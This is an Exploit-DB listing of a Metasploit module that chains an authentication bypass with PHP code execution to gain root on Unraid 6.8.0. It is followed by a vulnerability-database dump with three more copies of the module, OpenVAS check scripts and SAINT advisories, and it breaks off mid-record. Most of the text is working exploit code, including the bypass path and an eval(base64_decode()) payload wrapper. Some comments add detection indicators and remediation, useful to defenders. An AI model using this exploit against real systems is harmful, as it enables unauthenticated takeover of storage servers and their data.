ID EDB-ID:48353 Type exploitdb Reporter Exploit-DB Modified 2020-04-20T00:00:00
Description
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module for Unraid 6.8.0 (CVE-2020-5849 authentication
# bypass chained with CVE-2020-5847 PHP code execution through extract()).
#
# Defender notes, drawn from the advisory data published alongside this listing:
# - Remediation is an upgrade to Unraid 6.8.1 or later.
# - Both requests this module sends go to a path under
#   `webGui/images/green-on.png/`. The exploit request additionally carries the
#   query parameters `path` and `site[x][text]`. Those strings are what to look
#   for in web server access logs of an Unraid host.
# - NOTE(review): the line breaks are intact but the indentation of this listing
#   was lost in extraction. The code below is kept exactly as published.
class MetasploitModule < Msf::Exploit::Remote
# HTTP client mixin; supplies send_request_cgi, normalize_uri and target_uri used below.
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
# Ranking constant declared by the module author.
Rank = ExcellentRanking
# Registers the module metadata (name, description, references, platform,
# targets) and the single user-settable option, TARGETURI.
#
# @param info [Hash] metadata supplied by the framework and merged via update_info
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
'Description' => %q{
This module exploits two vulnerabilities affecting Unraid 6.8.0.
An authentication bypass is used to gain access to the administrative
interface, and an insecure use of the extract PHP function can be abused
for arbitrary code execution as root.
},
'Author' =>
[
'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
],
'References' =>
[
[ 'CVE', '2020-5847' ],
[ 'CVE', '2020-5849' ],
[ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
[ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
],
'License' => MSF_LICENSE,
# The payload is PHP code, executed by the webGui's PHP interpreter.
'Platform' => ['php'],
# Declared privileged: the description above states execution happens as root.
'Privileged' => true,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 10 2020'
)
)
register_options(
[
# Base path of the web interface; required, defaults to '/'.
OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
]
)
end
# Fingerprints the target by requesting a page through the bypass path and
# reading the version string out of the response body.
#
# Returns CheckCode::Unknown when no response arrives, CheckCode::Safe on any
# non-200 status or when the parsed version is not exactly 6.8.0, and
# CheckCode::Appears only for an exact 6.8.0 match.
#
# Caveat for anyone using this as an audit check: the comparison is strict
# equality, so a release older than 6.8.0 is reported as Safe. The NVD text
# quoted on this page describes CVE-2020-5847 as affecting Unraid "through
# 6.8.0", so a Safe result here is not evidence that a host is patched.
# Confirm the installed version is 6.8.1 or later instead.
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
'method' => 'GET'
)
unless res
return CheckCode::Unknown('Connection failed')
end
unless res.code == 200
return CheckCode::Safe('Unexpected reply')
end
# Named capture `version` becomes a local variable when the match succeeds.
# NOTE(review): another copy of this listing on the same page shows an HTML
# entity where this pattern has a space before the closing slash, so the
# literal may have been altered by extraction - confirm against the upstream
# module before trusting the result of this check.
/\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body
if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")
end
CheckCode::Safe
end
# Sends one GET request carrying the framework-generated PHP payload in the
# `site[x][text]` query parameter, then reports on the response.
#
# Response handling as written: no response is treated as the expected outcome
# for a blocking payload, a 302 aborts with Failure::NotVulnerable, and every
# other status code (including 200) only produces a warning. A connection
# error aborts with Failure::Unreachable.
def exploit
begin
vprint_status('Sending exploit code')
res = send_request_cgi(
# Same path as in #check. Per the advisory text on this page, the auth
# whitelist matches with strpos, so extra characters after a whitelisted
# entry are accepted without authentication.
'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
'method' => 'GET',
# presumably stops the HTTP client from re-encoding the values below,
# since the second one is already URI-encoded here - TODO confirm
'encode_params' => false,
'vars_get' =>
{
'path' => 'x',
# PHP wrapper that base64-decodes and evals the selected payload,
# hex URI-encoded. A `<?php` fragment (possibly percent-encoded) in a
# query string for this path is a strong log indicator.
'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
}
)
if res.nil?
print_good('Request timed out, OK if running a non-forking/blocking payload...')
elsif res.code == 302
# A redirect is read as the bypass having failed, i.e. the request was not
# served without authentication.
fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
else
print_warning("Unexpected response code #{res.code}, please check your payload.")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
{"id": "EDB-ID:48353", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)", "description": "", "published": "2020-04-20T00:00:00", "modified": "2020-04-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.exploit-db.com/exploits/48353", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "lastseen": "2020-04-20T11:44:02", "viewCount": 55, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-5847", "CVE-2020-5849"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157275"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143518", "OPENVAS:1361412562310143519"]}, {"type": "zdt", "idList": ["1337DAY-ID-34260"]}, {"type": "saint", "idList": ["SAINT:74C0293BF5130A596F2DA5BDCEF8CDFC", "SAINT:12D923E478A5F12917E694F4DC11168D"]}], "modified": "2020-04-20T11:44:02", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2020-04-20T11:44:02", "rev": 2}, "vulnersScore": 6.7}, "sourceHref": "https://www.exploit-db.com/download/48353", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::PhpEXE\r\n\r\n Rank = ExcellentRanking\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities affecting Unraid 6.8.0.\r\n An authentication bypass is used to gain access to the administrative\r\n interface, and an insecure use of the extract PHP function can be abused\r\n for arbitrary code execution as root.\r\n },\r\n 'Author' =>\r\n [\r\n 'Nicolas CHATELAIN <n.chatelain@sysdream.com>'\r\n ],\r\n 'References' =>\r\n [\r\n 
[ 'CVE', '2020-5847' ],\r\n [ 'CVE', '2020-5849' ],\r\n [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],\r\n [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php'],\r\n 'Privileged' => true,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 10 2020'\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),\r\n 'method' => 'GET'\r\n )\r\n\r\n unless res\r\n return CheckCode::Unknown('Connection failed')\r\n end\r\n\r\n unless res.code == 200\r\n return CheckCode::Safe('Unexpected reply')\r\n end\r\n\r\n /\\sVersion:\\s(?<version>[\\d]{1,2}\\.[\\d]{1,2}\\.[\\d]{1,2}) / =~ res.body\r\n\r\n if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')\r\n return CheckCode::Appears(\"Unraid version #{version} appears to be vulnerable\")\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n begin\r\n vprint_status('Sending exploit code')\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),\r\n 'method' => 'GET',\r\n 'encode_params' => false,\r\n 'vars_get' =>\r\n {\r\n 'path' => 'x',\r\n 'site[x][text]' => Rex::Text.uri_encode(\"<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>\", 'hex-normal')\r\n }\r\n )\r\n\r\n if res.nil?\r\n print_good('Request timed out, OK if running a non-forking/blocking payload...')\r\n elsif res.code == 302\r\n fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')\r\n else\r\n print_warning(\"Unexpected response code #{res.code}, please check your 
payload.\")\r\n end\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\r\n end\r\n end\r\nend", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T07:37:10", "description": "Unraid through 6.8.0 allows Remote Code Execution.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-16T18:15:00", "title": "CVE-2020-5847", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5847"], "modified": "2020-04-17T17:15:00", "cpe": ["cpe:/a:unraid:unraid:6.8.0"], "id": "CVE-2020-5847", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5847", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:unraid:unraid:6.8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:37:10", "description": "Unraid 6.8.0 allows authentication bypass.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": 
"3.1"}, "impactScore": 3.6}, "published": "2020-03-16T18:15:00", "title": "CVE-2020-5849", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5849"], "modified": "2020-04-17T17:15:00", "cpe": ["cpe:/a:unraid:unraid:6.8.0"], "id": "CVE-2020-5849", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5849", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:unraid:unraid:6.8.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T15:09:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "description": "Unraid OS is prone to a remote code execution vulnerability over the Web UI.", "modified": "2020-05-08T00:00:00", "published": "2020-02-14T00:00:00", "id": "OPENVAS:1361412562310143519", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143519", "type": "openvas", "title": "Unraid OS < 6.8.1 RCE Vulnerability", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/o:unraid:unraid\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143519\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-14 08:15:48 +0000 (Fri, 14 Feb 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2020-5847\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Unraid OS < 6.8.1 RCE Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_unraid_http_detect.nasl\");\n script_mandatory_keys(\"unraid/detected\");\n script_require_ports(\"Services/www\", 80, 443);\n\n script_tag(name:\"summary\", value:\"Unraid OS is prone to a remote code execution vulnerability over the Web UI.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"affected\", value:\"Unraid OS version 6.8.0 and prior.\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.8.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif 
(!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E\";\n\nif (http_vuln_check(port: port, url: url, pattern: \"PHP Version\", check_header: TRUE, extra_check: \"PHP API\")) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T15:09:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "description": "The Web UI of Unraid OS is prone to an authentication bypass vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2020-02-14T00:00:00", "id": "OPENVAS:1361412562310143518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143518", "type": "openvas", "title": "Unraid OS 6.8.0 Authentication Bypass Vulnerability", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/o:unraid:unraid\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143518\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-14 07:25:48 +0000 (Fri, 14 Feb 2020)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2020-5849\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Unraid OS 6.8.0 Authentication Bypass Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_unraid_http_detect.nasl\");\n script_mandatory_keys(\"unraid/detected\");\n script_require_ports(\"Services/www\", 80, 443);\n\n script_tag(name:\"summary\", value:\"The Web UI of Unraid OS is prone to an authentication bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"insight\", value:\"In order to check if a web page requires authentication, unraid uses a\n auth_request.php file that contains a whitelist which uses the strpos function for comparing strings. 
The\n whitelist can therefore be bypassed by appending additional characters to an entry in the whitelist.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker might get full control over the host.\");\n\n script_tag(name:\"affected\", value:\"Unraid OS version 6.8.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.8.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\n# Already no authentication in place\nif (get_kb_item(\"unraid/http/\" + port + \"/noauth\"))\n exit(0);\n\nurl = dir + \"/webGui/images/green-on.png/Settings\";\n\nif (http_vuln_check(port: port, url: url, pattern: '\"PanelText\">Date and Time',\n extra_check: '\"PanelText\">Disk Settings', check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2020-07-19T20:05:30", "description": "This Metasploit module exploits two vulnerabilities affecting Unraid 6.8.0. 
An authentication bypass is used to gain access to the administrative interface, and an insecure use of the extract PHP function can be abused for arbitrary code execution as root.", "edition": 1, "published": "2020-04-18T00:00:00", "title": "Unraid 6.8.0 Authentication Bypass / Arbitrary Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "modified": "2020-04-18T00:00:00", "id": "1337DAY-ID-34260", "href": "https://0day.today/exploit/description/34260", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::PhpEXE\r\n\r\n Rank = ExcellentRanking\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities affecting Unraid 6.8.0.\r\n An authentication bypass is used to gain access to the administrative\r\n interface, and an insecure use of the extract PHP function can be abused\r\n for arbitrary code execution as root.\r\n },\r\n 'Author' =>\r\n [\r\n 'Nicolas CHATELAIN <[email\u00a0protected]>'\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2020-5847' ],\r\n [ 'CVE', '2020-5849' ],\r\n [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],\r\n [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php'],\r\n 'Privileged' => true,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 10 2020'\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, 'The URI 
of the Unraid application', '/'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),\r\n 'method' => 'GET'\r\n )\r\n\r\n unless res\r\n return CheckCode::Unknown('Connection failed')\r\n end\r\n\r\n unless res.code == 200\r\n return CheckCode::Safe('Unexpected reply')\r\n end\r\n\r\n /\\sVersion:\\s(?<version>[\\d]{1,2}\\.[\\d]{1,2}\\.[\\d]{1,2})&nbps;/ =~ res.body\r\n\r\n if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')\r\n return CheckCode::Appears(\"Unraid version #{version} appears to be vulnerable\")\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n begin\r\n vprint_status('Sending exploit code')\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),\r\n 'method' => 'GET',\r\n 'encode_params' => false,\r\n 'vars_get' =>\r\n {\r\n 'path' => 'x',\r\n 'site[x][text]' => Rex::Text.uri_encode(\"<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>\", 'hex-normal')\r\n }\r\n )\r\n\r\n if res.nil?\r\n print_good('Request timed out, OK if running a non-forking/blocking payload...')\r\n elsif res.code == 302\r\n fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')\r\n else\r\n print_warning(\"Unexpected response code #{res.code}, please check your payload.\")\r\n end\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\r\n end\r\n end\r\nend\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34260"}], "packetstorm": [{"lastseen": "2020-04-21T06:58:40", "description": "", "published": "2020-04-17T00:00:00", "type": "packetstorm", "title": "Unraid 6.8.0 Authentication Bypass / Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "modified": 
"2020-04-17T00:00:00", "id": "PACKETSTORM:157275", "href": "https://packetstormsecurity.com/files/157275/Unraid-6.8.0-Authentication-Bypass-Arbitrary-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::PhpEXE \n \nRank = ExcellentRanking \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution', \n'Description' => %q{ \nThis module exploits two vulnerabilities affecting Unraid 6.8.0. \nAn authentication bypass is used to gain access to the administrative \ninterface, and an insecure use of the extract PHP function can be abused \nfor arbitrary code execution as root. \n}, \n'Author' => \n[ \n'Nicolas CHATELAIN <n.chatelain@sysdream.com>' \n], \n'References' => \n[ \n[ 'CVE', '2020-5847' ], \n[ 'CVE', '2020-5849' ], \n[ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ], \n[ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ] \n], \n'License' => MSF_LICENSE, \n'Platform' => ['php'], \n'Privileged' => true, \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ 'Automatic', {}] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Feb 10 2020' \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/']) \n] \n) \nend \n \ndef check \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), \n'method' => 'GET' \n) \n \nunless res \nreturn CheckCode::Unknown('Connection failed') \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe('Unexpected reply') \nend \n \n/\\sVersion:\\s(?<version>[\\d]{1,2}\\.[\\d]{1,2}\\.[\\d]{1,2}) / =~ res.body \n \nif 
version && Gem::Version.new(version) == Gem::Version.new('6.8.0') \nreturn CheckCode::Appears(\"Unraid version #{version} appears to be vulnerable\") \nend \n \nCheckCode::Safe \nend \n \ndef exploit \nbegin \nvprint_status('Sending exploit code') \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), \n'method' => 'GET', \n'encode_params' => false, \n'vars_get' => \n{ \n'path' => 'x', \n'site[x][text]' => Rex::Text.uri_encode(\"<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>\", 'hex-normal') \n} \n) \n \nif res.nil? \nprint_good('Request timed out, OK if running a non-forking/blocking payload...') \nelsif res.code == 302 \nfail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.') \nelse \nprint_warning(\"Unexpected response code #{res.code}, please check your payload.\") \nend \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\") \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157275/unraid_auth_bypass_exec.rb.txt"}], "saint": [{"lastseen": "2020-05-03T02:46:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-5847"], "description": "Added: 04/30/2020 \nCVE: [CVE-2020-5847](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847>) \n\n\n### Background\n\n[Unraid](<https://unraid.net/>) is a network-attached storage operating system. It runs a web-based graphical user interface (webGui) written in PHP. \n\n### Problem\n\nThe Unraid webGui uses the PHP `**extract**` function to load all GET parameters into the application as variables, allowing a remote user to control any program variable, leading to command execution. \n\n### Resolution\n\nUpgrade to [Unraid](<https://unraid.net/>) 6.8.1 or higher. 
\n\n### References\n\n<https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/> \n \n\n", "edition": 1, "modified": "2020-04-30T00:00:00", "published": "2020-04-30T00:00:00", "id": "SAINT:12D923E478A5F12917E694F4DC11168D", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/unraid_webgui_extract", "title": "Unraid webGui remote code execution", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-06T00:57:42", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-5847"], "description": "Added: 04/30/2020 \nCVE: [CVE-2020-5847](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847>) \n\n\n### Background\n\n[Unraid](<https://unraid.net/>) is a network-attached storage operating system. It runs a web-based graphical user interface (webGui) written in PHP. \n\n### Problem\n\nThe Unraid webGui uses the PHP `**extract**` function to load all GET parameters into the application as variables, allowing a remote user to control any program variable, leading to command execution. \n\n### Resolution\n\nUpgrade to [Unraid](<https://unraid.net/>) 6.8.1 or higher. \n\n### References\n\n<https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/> \n \n\n", "edition": 1, "modified": "2020-04-30T00:00:00", "published": "2020-04-30T00:00:00", "id": "SAINT:74C0293BF5130A596F2DA5BDCEF8CDFC", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/unraid_webgui_extract", "title": "Unraid webGui remote code execution", "type": "saint", "cvss": {"score": 